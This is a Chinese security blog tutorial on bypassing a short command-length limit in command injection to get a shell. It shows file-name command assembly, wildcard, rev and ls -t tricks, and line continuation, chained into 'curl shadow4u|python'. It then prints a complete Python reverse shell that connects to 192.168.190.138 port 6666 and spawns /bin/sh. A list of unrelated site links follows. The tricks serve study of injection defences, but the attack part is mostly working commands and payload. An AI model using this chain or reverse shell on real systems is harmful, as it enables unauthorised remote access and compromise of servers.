挖洞经验 | 命令注入突破长度限制
0x01 背景
很多时候,在我们历经千辛万苦挖掘出一个漏洞或者找到一个利用点的时候,却因为一些egg hurt的限制,导致get shell或者send payload无法成功,其实很多高手都是有一些trick的,但是往往一串包含各种trick的高深payload甩得你不知所云
最近遇到这样一个问题。命令长度限制在5,如何完成注入get shell?
Array什么的都尝试无果,在学习了各种大牛的trick后,才恍然大悟,希望给初学者提供一些新的思路,集思广益。
0x02 命令组装
首先是命令组装,先来看一个例子,准备工作 mkdir cmd;cd cmd;
分别输入>echo >hello,可以看到分别创建了两个文件echo和 hello,然后执行*,结果输出了hello
很多人一定已经明白
此时等于 echo hello,我们可以通过**_echo _ 来查看*到底是啥
这样,我们通过>echo >hello 完成命令组装,然后* 组成并执行了命令echo hello
同样的道理
不过这次让我们把命令长度限制到4
那么如果我们要执行命令ls -l怎么办
我们模仿上面做法,输入>ls 和>-l产生了两个文件 ls -l
这有个问题,我们刚才生成的echo和hello,e 的顺序正好在h之前,所以ok。但是此时文件的显示顺序-l在 ls前面,如果我们执行 其实是执行_*-l ls_,会出现错误
那么如何获得ls -l呢,先是第一种思路
0x03 反转命令
我们把这个命令字符序列反过来看 l- sl
这样是不是顺序正好满足要求,接下来我们只需要用一个可以把字符反过来的命令,就可以完成这个功能
这样,我们先生成l-和sl两个命令
然后将l- sl组合写入文件v(为什么文件名要用v ,下面会解释,是个trick),最后用一个命令将文件中的字节反转
如果我们直接使用ls>v
可以看到文件v中多了一个v,对我们命令造成干扰
我们只想文件中存在l-和sl
_trick1 _
这里有个技巧
dir a b>c只会将a b写到文件c中
我们创建一个名为dir的文件,然后执行*>v,可以获得l- 和ls
接下来就是反序
trick2
有一个rev命令,正好可以将内容反序,我们产生一个名为rev的文件,然后执行*v ,此时命令相当于rev v(这里就是上面为啥文件命名为v,为了被通配符匹配),这样就产生了我们要的输出ls -l
然后就是输出到文件x,然后就可以执行sh x,成功以4 个字符执行长度为5的ls -l命令
整个命令链(长度<=4)
完成ls -l
0x04 控制顺序
理解上述命令之后
假设我们要生成ls -t >g
逆序是g< t- sl,按照字母顺序 t- 会在 sl 后面,不满足需要。所以我们变通一下,生成命令ls -th >g,逆序就是g> ht- sl,正好满足顺序要求,然后依葫芦画瓢
_trick3_
上面说到文件名排列的时候有默认顺序,怎么自由控制顺序呢
其实ls -t 也就是根据mtime排序,新的在前面
而-h对顺序本身没什么影响,可以方便构造payload
比如我们要生成ls -l,可以通过ls -t打破默认顺序
0x05 命令续行
通过前面的一连串命令,我们已经得到ls -th >g
trick4
然后还有一点,linux的命令续行,比如ls分成两行,都是ok
这样,我们就可以构造一连串的拼接命令续航。比如,我要构造命令curl shadow4u|python;
py这里看着是5个字符,超过了4个的限制,实际上是因为 shell环境需要输入产生,但是php 代码exec时,只需要输入即可产生,比如 exec(“>py”)即可。所以这里实际上是不超过4个字符的,为了演示直观,在shell中直接执行。
执行ls -th>g
然后sh g,实际执行反弹shell命令
curl shadow4u获得的内容
importsocket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.190.138",6666));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
0x06 payload链
所以,完整payload链为
生成包含ls -th >g文件x
然后生成curl shadow4u|python命令续行文件
然后执行sh x把curl shadow4u|python命令写入文件g
然后执行sh g,getshell
0x07 总结
4个trick思路加上重定向和反弹shell知识
trick1 命令组装 dir a b >c trick2 通配符的妙用 *v=rev v trick3 按时间顺序排列文件 ls -t trick4 命令续行
- JavaScript对象length
- Go1.8.4和Go1.9.1版本发布
- Javascript数组操作
- Tensorflow官方语音识别入门教程 | 附Google新语音指令数据集
- jQuery VS JavaScript原生API
- 居于H5的多文件、大文件、多线程上传解决方案
- 抛弃websocket,前端直接打通信道,webRTC搭建音视频聊天
- Golang学习-第三篇 认识Web框架
- Golang学习-第二篇 搭建一个简单的Go Web服务器
- 数据说话:Go语言的Switch和Map性能实测
- Dora.Interception, 为.NET Core度身打造的AOP框架[4]:演示几个典型应用
- Dora.Interception, 为.NET Core度身打造的AOP框架[3]:Interceptor的注册
- Dora.Interception, 为.NET Core度身打造的AOP框架:不一样的Interceptor定义方式
- Dora.Interception,为.NET Core度身打造的AOP框架:全新的版本
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- Android中RecyclerView实现Item添加和删除的代码示例
- 小程序图片上传,存储,获取,显示(含源码)
- Android网络请求框架Retrofit详解
- Android控件RadioButton实现多选一功能
- 解决Android使用Handler造成内存泄露问题
- Android中imageView图片放大缩小及旋转功能示例代码
- Android 中 ThreadLocal使用示例
- Flutter基础widgets教程-Transform篇
- 借助云开发实现小程序模版消息推送(含源码)
- Android 监听软键盘状态的实例详解
- Android 中 ActivityLifecycleCallbacks的实例详解
- Android 优化Handler防止内存泄露
- Android Spinner 组件的应用实例
- Android编程实现扭曲图像的绘制功能示例
- 直播带货APP开发,圆形旋转动画